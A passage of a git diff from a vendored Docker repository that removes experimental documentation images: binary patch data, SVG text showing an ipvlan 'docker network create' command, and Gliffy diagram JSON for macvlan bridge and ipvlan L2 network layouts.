zoSflMeMmetKwEl!)5L+0Uw9fFH*gq}`JeJlSUgB{;#lZV8^|0&-ME)EW5O55YC`yU zrT54aHU)3xU|Sx-BO>tpAk~+R|ZI!X-W= z^ms^J!H)EUq!h%=GYApE@S_IU>r7JN_&V#k?>iffLNkL3Qld5wx)zHgw}(@Hbm6M* zDt_}n**q&ANsPL^mDbEmOCf^9>OfZTN#QJkhD2pcVHQT{6y&#iQJ)~87{ozoMaFAV zDE$e*T#Vpt^WCi6TpJLG0->Nb(My1MopnZt3l@|4`X&sK`dK8OEm+Cp#2Uah`AMW- z{ltLZAOZo=dE5A!7b)fBj3N>(JhYbHH-_xEj zN6TjP7-^jmqS7?CGg%HVtNL^4P#VCnlWzn-^Lk=l$A6z=4j^45p4T~3+I`9+`Lv6&q~9~b_$*mQ(C}9|#gX4wiJwgPo*+dTayt5UI(TBJ$+Cs~|9X15|%tnViju(nQj?B<662bBTB=}y08IzTJz>OZ{ zC2({rJG8g2!VH6@1lRRL{kJaJyEa|%z5}q}ps~2gz`_rCF&+8P`=vpnj02dRf{-f* zAWVPv@u#MWFrGI$auVGqhsaj*Afsk&;mFCk6Nfp7bhmxgU7k?f&5-h(shpAJRBUPF z!n{VBk#T)rNc%mQ(xBrD7wNRNJNos{Prguh@{Q4h_1+$J<#t_hlkH{WBK+BnqYm&F ztEmeGwHO?Y~_7q$H%TR(T>v#Z!!=cDEr~*dAhej`#KPXbG+U7ce)1F0Wpk% z#MJL%Q--q<1%?f5iW6es)zSf}Wc1!wrul=8Lt7kgc+y$wF+9F*%lM?_pYL=&$l<@(Jjj(eKT3F9X?J*6ewX-py#=Jj=R zRoB3|4!1=*$7g3!bfmToCHH8EU|zR)vuYp-O^6A?sSp9)7cDfN(vaXFh(TAr=K>pG z{un#VO8zO%8-Y%j)7#Pg!%UYhIL=%3F)QhJ(Cw1#wz1)+86ED&F7?L0*Fa)iBbY#Q z0=mBEg7f!CVF*dp#GQ&%1IA*lR-(}sfmkjlC<2sCoiK8hmNQ|x;8Ee;{vbmNR!LF()|Q{2H#_Z2_Yr%IC!-mQeT5^&)h1kVxk$D14MjjG%5 zD|JkP)&V1EJ|Mu^csd)~N*cUel8v1quPe6$HF_Lg*%Sbm4(!10x@%zbM>?LKuxOPG za)`l>#Paa$?h;7oZOWg&(fO>i2tUhm)o;R&{!sb07Hc?m$@ikH|kfCWHU*tE$) z(Z1gw@{OZ>Ru@9Zu?3nHT*uP7qkbm|#ULDl)YJh&Q3;b>){z&-;?C6d^kMJm(ON?x zFB=^7+wl;15wcx2{hf36edl#1i#3G!WKuX}-{n&T*uGCz9@o%;WD+yrgmFGxHO$@O z+}}Z++mB!OP2kERCjPqZ>BABZxB;jrr<26pWzK7ZUR$fJ52_FOUhN&+QqGGrz)U|m z?AVyaV=+Ts$=HLWM0Zxh(JX<@Rf3-nGFnT6UZy4vrF@be8V=Q8GQ4dPbwp7Lkvth> zJm)5+G>giI&LJ^k^;6HsYFbHo^lYEcf2dV6(jGTbMyp3?YPafBW#b#Q!nW9*7Msi1 zd&Mt9L74E0uLO`yL8xZkwvhWSsulJVhA#Jm(^(Kzvgz@t=*8vzTrFvk^B+=$03WZj zRV^d>MBBTm2c}5s`2yU9Xh(=4T7frJ6VfLy$Ci+BtQdTU3 zd5l&taN}ZRG2w%1x92AITl1^?!BSp|fRA%u_!5E+EB|Lp%ni+E!0%0xi;}t+RGiD7 zzM`~SCP}>2?eKYF%NCiZ#2`R}{&q)wSIp{Asy>C$kZO}yMLs^^;#GzKbS7(k36!uf06Z#|e zx*tAU%1811d|yg?vlD08PR~m&Vb{?O`WG9`)JFNb>-`xHoJ$#1dh#AmT5pVvS0`e8 z>ITWWXd_kNEvsRCPku)X1vCz>><^yk41wTBFa|~A9uTMi zGU*kw3ArXIqqp_#5x){d+Yk1qFh0@VSj$}sC+k}c&tCnz(%Zyl+>H!4t&;l-v^QbC zuFL~^61eSn)YEj;n4T$AMMx<)t19B@yDtn=DE z%d$cD$+cFO%Ok5&N3t2i|DZg6WO(;4Z1R8zUarsw+Gl|DCZ^F!6Ku917=nRUrDaQC;((|5bk3#EuDg(C8dM8zi#N?!^DD*J zl8^t#L-=KQk)_=!qeF097**xENI4nB-Hrk&-+2EcV;|mD$>718qhD&d!sVi^%Z;`e zG->sKZb)9jCZ&4z41z82_sbDph9hBScaTc3ZkzSzw6`LH{Bs@7xCLDQO%m)8o1RsJ zb5OG+`3JFuX&5Ys8_5YA#4=lqhulntMDjTMpJWudYSN1Q&zLa5VGdCzO(VnNW zSaxrcLSi)I@azIDV_5_V5eU<Vxka##r?>5(^|}#>ROKt{QnCU z#DwD6gpTc4zz+kj!7D{9vADZx**ku@&1Dh^vau4`aBsh2fM1-u+iJnet#27HXt0=yjrZf_2bdD{3u0wb1 ztk`VS+>C=nKm@mGQN$~|q%BT9IpW2_ma-laOSD1cW5eAtMxF~NX`&b=y?39O5!V)yk*YUvpXP;-ot zp3XYt^|@o@^!JC(;w8$X7uU!_Z=qk~1gPZ_p6SY63< z-Z5cBjpCHm^%bGrd+%^>m%+Ey)TNbp+o(t3zs8x?f#xPncu37YNd~SIgFY{F$8W22 zn^@u9pNUw1c~;Dzdg*pQQ$76{{X5R@-U$9#HuGkriW#`A~*vshU#7Z zbX?V($VC4>nR04uLJ&LfcFwx^-=S1yC`I^&Pp_{2#NRj@w>_V9;u9fSNUga6heP+mrf=TB-R7JO=w;_ zzhdVV@Tl{l`|E@v3Cb6ExgFu)!Jyi|OIFapuhNF#6S5o(-b!p*-wyr3Tyio({~$l} zCz;NR(U(s$EppiT?MsvYrl-}?CGz-ZDaMC3b5zLNM5r=nx8v2iA;wK^*>I+KRKe() zWhSc+azN zyPPrUXx~AJsk34(T885e&2hgYseccc`*+-?2Fs#S0gLlUqdpWCf|boccW!7GQ1_U z1hr32NThsRGG|^}I9g3ZV`!FqLnZ&=MGDWXc*bqPGU>~RG@&tG{`9m5j5X}-$;xnR zmnNj+^|Q9sFA?5$3zKMy`n*BVzZ5X97##Ra_#bP$Y3}qPuP6F=Sq?)Vt-(CIC#KN5 z(x3Za=uloqyq%ZFXC%?{ssH{aK~3Y@`6R#R zc2?ovyuPvGP5Yu|rRO4gj#eo#R1@Hs^j3a%b`{^LD8YSpL5a1YQWfnB1zrI5^1aRgrX1`-0#0 z@?^eE6Xy1xNP27H6A|AoYiVf-R{@9*dAE)G7C(U(6IfqN9@gP6?&3Tx)8$M{_t#kc z_+1c1>W}{0E_+58F~{^6s>XFT*GEU1VgdYWvmGYU{#7ak&gr7u8~kCQpQaqsE#~pGnDU-zx%p2coe&^WxpC^{J8yg>iUcB z%7KQjsT?Bqdlr`&9xqW?QAb=F-~Fo>p?tUcAn#FZ%zHfHa75l%zM}?u=B`eQLBl``W8T#~K}l2*i);+X6tjk1od`E<Y=KV3#P-k7eqGT4vqwhBlo65 ztTaME%Y#Jh8FkdQJSCx#Hr{%JIXeBPR7JPYBK2Jl#-%6PY5G~ph}q1Wt?czkwS`X{ zyc6%}J&qC-5yAmc{s#k1o`37J4Xe|z&0j{^Wbsn}T(zBQ-+Ay@YOPaH42kKAZQ&~o zB;#$xe&4N1i)V@I25-gNut0?(nZyyoHsN*cK3%6vsLeQdDv^v`n3=ihh{qwe2X-y+ z|FzN;nV|12mLS?6gb7Nm;H%};AHZnUJYw6~Ak#~YsV!^wU)p9i(c;2-41MTa>HF@U zb|^cRS!3_pl~O{)sndA!Gs>b5d+xKweeuF;Mp*FzY9WX{^~bLnFzN&Eyo??MJ1CIW z)+_Lb4_dgOBTwXzsqGPs-Rn1hlBQSq#x(L?H}XiEh<^&NuH^7bVU_2$c%Lf=rdmp3Ika3ZNCpvIcWJ>I;p2pp4KJ*Y$bb5iMrlIp-YpUQ-XPY< zVsD;u#DWo`$DmhnSi+;|o5sRgY-d$gVu&8I6~imjCdd2~-T-1k59YaGA&iaHIi)8SWJp6&U?3zxQ1yobk<|N-nQ1@dcLG>1g#7Lk$$dV7a4riS zs>4Lzu_K-6tmmAPPXBEKlk0x^yd4W-isCyB$!GCO@vaYg+0aDT@fI)NvHW!XA7(0O zL!G1qYjm@LGk1*sHw$`UO3h00EEth@TUG(p5`PLNevikg7>4$TVq+^&&`#BYx^9O}}Dq{44aJB916HfW>L&MNk!s)l$m9J4V|-Yjd2Usct1c*rDSyF z8J#b$#-xF7lKcFs$@;E6d{7&ZWkLp|c*1^iFZew;q;1E8r39VGtvpq1!O;q59g-EM_5M5wJ&jy95n3e11Bjc+k%xM~pQm4C;D9XpYL z^zkQhvUO1=+S^a~@*MMXU(6^8QQ_}bWszEHHs2mlU?DB$hnTbZNvl_Y^{5tmf_kW7 z7>PD>P|{RpgiOT=f`4xi$L>O{N~$sp?L&)Phg>H%Xj+-b>4(QIgl*oh9FvxZmlx=I z?Uki9PNg&Gs%X*JS7fAzIUEVc6U@EnG7n{XI+SSSojGM>U>dA9yO$6a4*Qq)&8XB> z$9LT%ZlUkovhbG!Uf2Z$$|El>$JtN>f#bCMWUTop5^VCCKN_#;98u-Qzf(q>r4UR1 z)mHJyRTTa0HPtjfHZt6Qf|2~O>#xC)uqyq*lkW7O&$F*$B8HKnQsSnoiO(MJPDNmW zXXV$3TkYN3qkZ^lu&f#%#gN|Is@cV|tbrAx*TBWamFItnJT*?UKUf#?q0kh{_H=*W zMvb5p%Y}uYRt_-5e|rc5DAlW+XY=FgYW5nV z>+tU`KO&)l9xAHYuw(I(rp4zVZ}y6}XE1c$hJEF$M<2&Q_O+Oso6}t`2_5js+?WD; z2r)vtP-X%_iA*!^>!RCJD-O_vypBKbr0Nk$?P00TaXSz~|=(@*#;%gqky z)Kv8hX8FEZk=v#vYx1k_F;t1kd@(keVNT3UEMf2P#U zF6jI`E?gig`BmUU)wh~r5DN}_3Up*M3WuI>+1#B_7woHJL1}Jnk*es@^USNzTNT6h z=N*c+xTK_H1voS`R2vo<8Mz#Qjg74dq@_*6QQmr8>aZ{|@;n*4lisAb2Xuq!(0CZ_ z8L6>kG~}feh>PX5aj|@XUnFyL^RNvxjD?G7i1(r%X=}EP+FUn+7js!$&YIhfY64CL z+x_xRsL06Jpg37^hzPr8pZ)Bn0j;c*=7V>`l&+-kJR5&>hr>I(3VUj_csveGTCSez z+>Hf?&@i54Kzz=u6QP4Ri(O_@9zL!|>6zhQ!8OaJDk%W&G^rh0qe!RwFTGZb6|Z){|6HO0lno z_-RWgnH#>kQU5)Ji7Uw7c6qY3>+@5cQRFwJ2K0Dw!cyeL>YX(Nr5|aggseJoPnQuW zDDtcLf^<)D=Pg+$MNK0Xi^&eIAH{5QF@yBZM-9N{0YuD#P3x*TOs;~3nh6m6$*cK& z&9K`5=9>)tP3wb6L&t9E<%yNzpm3W|7i+tg0*{Z^^801*SFx1uj}8YFwj1h(xR|yq zON-+tRS6c7#x|2wb)VLnsd>Q@*h%W$Bn^|rEM_dJI@MY?Rurq&YY3?@QR>cztxq`qR!X0xEi4w z1ZH~?=0G?)ieKqxuZV*f+I}y}$6xV0Je30Pr)gnefX97=q&%OuV%=mp1MKOt=g&RO z2u>v>)?;mT%BC)(P;@fXhB)GgTsF(7&G@ieJ^uJETKAkNks!L=(bSMeNNPk>kb7-q zeae=F{aU2IYSGMu2pM6I_Z&kq&C!k?3|$J<*npK@v>=4TXEw4 zKNc2K^j-Zy!zaxrc~Aw{e9_h3<#nD-;w&7&qRXGLZTf3mxkdLSoNw1N`tL1@3c8#oY zg3t3_PY>%}g;8+#FC)t02H^-fe#REeOti3|FnBq;+rDZ{R?qhT1-F_jwfOlv2xTZ+-Q5bkc}5Rj=YJ(kfT^WMiLmwaxlXw1X~SQaIquj6l%# z$*_!JtuSpLwk-+y{UxD^G+S|wX#FH@m=|OA?iNC_?F#$Skc56=*8ShUUFGT6h_%h3 zDuW+X(^+hcD`-^2oBB zED1w>$or-H8^9bPN(hqe@J4%M4Nws{27yY|*jxlrE)++tg3=2+JbzZ2Ht-15TzK2( zEq@uGva_@>V@*r=f#R=^#tFA#S;+~JCLezy#kdhPvTm=@ZAard>^n4z6qqcAIr~g_ z#zlSVwb9|mvC)lKK8gH<45w_q2$fRdOU>ZG%?fwY1k)=DIMr@iid2LJV%i*cvHJxC zeK-iiNwsjoCc9#5IWhHip{oDWoEzKd$WoG{m^-&B@+J*vHuEXhEED z?|T86vw&w*or*ZAt83}swy@B_|5L@4heN@2@iB+lyphifqZgWQiDiWG7T8 z`#xoC*(Qx8WNT!X$Yh%g4GmdJV;}n(2H8S=qxX;R`|h9TxxahQIrp63xzBT+=WO=Q zvv&xkTVy$y2nDO7>hr(8kj?NYZD5}*E(}&iqqr>BZQ{l-<4a|ZLzRzN`e|QDzCgw6 zfaMiSn!lqWoAY!Rog+XkrjUS?%ah~rWqZN{^AZWtEs-h$=E$*ep^NvYb}u!eHgLjl z{IRL(gGx$XK1gG!i_vv3rw?jw(0%yz+=9LHr{&*^N*uX82v}xIFilM3EqE#Ex_W4P z42NiqPMkynkB`8mg*LM~Cd9L8X8-v#;clUNVMJsUFLrmG$>g@t-Q(RLtt>j0 zz!E`aE|&d;%2fEwG`Y7S27mk{%Ej!}8I$ADwDz)&CvepPARixJ0j*klw1HqLiaLz* zu$|mTqo7W7AJ})o+B`9L53V0O$*IzmZ68%Dbp~8kk>pQmK-R>Fo7=$|wW=)mcnNEX z>TF#uy8Y$~Vt(ohZd9CJ)b6o**~|?SuF4B4ul}C80!~_3Ujr2*?{(!fjSjobZm&5~ zJC1vPed|ZaULhXuN^`*yK0CYn=B#1w6>oKqS+kdSOOWb9dlLjuw&-)R@h#9y)D{gU zW0NLSpF6K|)Xljy0ay}!EaWCFnNqC{*3O+N1Jeq-gekxBj6F!KmdH&0^>9H?hFgTG z!;ODkzV#q=_^Q11$Kr{;nJ>lfyp7DnmQWJ=N#oqo2t;QslVI5Ji2?o}na>QCp@T#V zE69-}5-}tT9hPod_#wgw& zDk*mX;;kBl4Sl)0bO;`w!1Fxbnt752v~PYN%)Z7$>I2P~==T<39(;w5N9(v3WIkmW zd59mlO}#Lz&mZF5o_1Saa?i;A;~6E|(~rvlZV)Bw-t^v_H)E4eu@!t>dDZS+`FE+t z_OhJ-jR9Z>_-<A32giG6D81%G&( zRCAgWi$9i+g-%x_`00^VV7b7zsW-YV`Mf#*1REgaT+!4Ryu^By*bsYkwdcq|pf!iV z7am3P(0ku(1#X-A4OHIQ%8M^b*rV=_67D2WU1vD4y8B3Z;o;8#LIj7kG+5-x&K+O3 zH8!NdfWP}KlT;&Xo@HjyAn=hiLrmu_sm$A_6N5@p#^a@7n11aWHs$hT3#-@?FCB(x zj8Fn3swk#Zk7YotnXl<$P~Is{!cRoT1jX-4l}(eC$BWIS?URCyWfF|LZ0+a#fAJ;i6MTs z2Q&}r{8_BXkVcz<19BRgENIV zybHBb4)gL)Qb>;N-i`i#D{k_u!9|eNiNu5H{mf|@1K-jqn0m z_1xEkjfz@j{&L|h$U?(v-m&(p9$rsHu892_Yc2@g($tEoe`6EoQ80uiFcnrRsHFuy z`1ekO+)nk8FdibDWB0x45%^w@{$!WtkT?5q2BTnh$-mH!+%}X~bkijH$PS0M#oC{z z==v~Ms~TwhA(`apZZqTa^2DIJDLIAx$V$KB_v~)yQX5);1Eyok`VkvmFiBqhFRpy% zQ+4Z)?GGtpYFvk_8>Ug;x0HbJex+umjl!_4SRf0HzQDKBpa9(RJ*FuoYoE3(inCc# z+%Knz9vYVG|FBj$8gf7a-ZB?oA0gaoJD9=T1sXeV`z^%Z8i9Q9pKNqgU9p`Ja$QY+ z2kj`#6k|MRtzno5!Xe0|Y8Wd}EsBX|!aA1; zo+O^W9QW8a#8Il?W+-QS8wfADdFkCioB-boKcPGHGDjrlkY(!|=G#L47oLntB&ad8 zdJfh%-H!`F)_%Rya`|T9Acr2w}sk15+(1H z=E^P#LrFjL-*YYN|3Fhy>)7EA|UOxZ=LwLZUJ;8NyHp6N@5M+40)g1xpq)1b#0CaR41Yb znbX*_ismgYzu4FFOfY%r63M%p>N!iTh`6uuiW@4^gZJk#F1v$8X!JDx;5x(B1aw^B ziv!@%#~}@6r?BJH8Am7P9M|}3rsl54YzxNO@cn5>3Ln`d!;SwRHE21Tk^1x~Pgs*EnrW>_iT99xEcEPiiYM8oqJ9GBrt| zbUs@Lx-}L7tKmRYcontainer1192.168.1.2/24container2192.168.1.3/24pub_net (eth0)DockerHostdockernetworkcreate -dipvlan \--subnet=192.168.1.0/24 \--gateway=192.168.1.1 \-oparent=eth0pub_neteth0192.168.1.0/24NetworkRouter192.168.1.1/24 \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy b/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy deleted file mode 100644 index eceec778b7..0000000000 --- a/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy +++ /dev/null @@ -1 +0,0 @@ -{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#FFFFFF","width":541,"height":352,"nodeIndex":290,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":{"uid":"com.gliffy.theme.beach_day","name":"Beach Day","shape":{"primary":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#AEE4F4","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#004257"}},"secondary":{"strokeWidth":2,"strokeColor":"#CDB25E","fillColor":"#EACF81","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#332D1A"}},"tertiary":{"strokeWidth":2,"strokeColor":"#FFBE00","fillColor":"#FFF1CB","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#000000"}},"highlight":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#00A4DA","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#ffffff"}}},"line":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"none","arrowType":2,"interpolationType":"quadratic","cornerRadius":0,"text":{"color":"#002248"}},"text":{"color":"#002248"},"stage":{"color":"#FFFFFF"}},"viewportType":"default","fitBB":{"min":{"x":2,"y":6.5},"max":{"x":541,"y":334.5}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":2.0,"y":6.5,"rotation":0.0,"id":288,"width":541.0,"height":22.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":31,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Macvlan Bridge Mode & Ipvlan L2 Mode

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.0,"y":177.0,"rotation":0.0,"id":234,"width":252.0,"height":129.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":0,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":16.0,"y":240.0,"rotation":0.0,"id":225,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":1,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":235,"width":106.56,"height":45.0,"uid":null,"order":"auto","lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container #1

eth0

172.16.1.10/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":138.0,"y":240.0,"rotation":0.0,"id":237,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":4,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":238,"width":106.56,"height":44.0,"uid":null,"order":6,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container #2

eth0 172.16.1.11/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":40.0,"y":-26.067047119140625,"rotation":0.0,"id":258,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":7,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":237,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":241,"py":1.0,"px":0.7071067811865476}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[153.5,266.0670471191406],[117.36753236814712,224.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":50.0,"y":-16.067047119140625,"rotation":0.0,"id":259,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":8,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":225,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":241,"py":0.9999999999999996,"px":0.29289321881345254}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[21.5,256.0670471191406],[62.632467631852876,214.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":60.0,"y":-6.067047119140625,"rotation":0.0,"id":260,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":9,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":241,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":0.5,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[75.0,180.06704711914062],[215.32345076546227,90.06897143333742]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":3.0,"y":184.5,"rotation":0.0,"id":261,"width":79.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker

Host #1

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":283.0,"y":177.0,"rotation":0.0,"id":276,"width":252.0,"height":129.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":11,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":291.0,"y":240.0,"rotation":0.0,"id":274,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":12,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":275,"width":106.56,"height":45.0,"uid":null,"order":14,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container #3

eth0

172.16.1.12/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":413.0,"y":240.0,"rotation":0.0,"id":272,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":273,"width":106.56,"height":44.0,"uid":null,"order":17,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container #4

eth0 172.16.1.13/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":315.0,"y":-26.067047119140625,"rotation":0.0,"id":269,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":18,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":272,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":270,"py":1.0,"px":0.7071067811865476}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[153.5,266.0670471191406],[117.36753236814712,224.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":325.0,"y":-16.067047119140625,"rotation":0.0,"id":268,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":19,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":274,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":270,"py":0.9999999999999996,"px":0.29289321881345254}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"l